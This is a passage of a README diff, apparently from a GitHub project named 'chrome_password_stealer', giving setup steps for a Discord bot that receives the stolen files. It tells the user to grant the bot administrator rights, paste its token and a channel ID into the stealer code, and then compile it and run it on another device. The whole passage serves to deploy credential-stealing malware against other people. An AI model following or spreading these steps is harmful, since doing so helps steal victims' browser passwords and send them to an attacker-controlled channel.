lleeerrriiiccc/chrome_password_stealer/README.md

 Then you ned to navigate to the bot section and create a new bot and enable all types of intents and select administrator on the bot permission settings.
 Then save the changes.
 ![Image of the bot configuration](https://github.com/lleeerrriiiccc/chrome_password_stealer/blob/main/images/intents.png)
 ![image of the bot configuration](https://github.com/lleeerrriiiccc/chrome_password_stealer/blob/main/images/intents.png)

+Then renew the bot token and paste it into the code where indicated.
+### Adding bot to server

+Navigate tho the 0auth section and click on bot and then administrator.
+Once this done select Guild install in the list below.
+Copy the link and acces to it.
+Select the server you want to use and click on authorize.

+After this is done go back to your discord app and copi the id on the chanel you want the bot to send the fil.
+Do so by left click on the chanel and select copi canel id.
+Then paste the chanel id where indicated in the code.

+## results
+After you completed all the previous steps you can test the code by running it in your own computer or compiling it and running it in another device.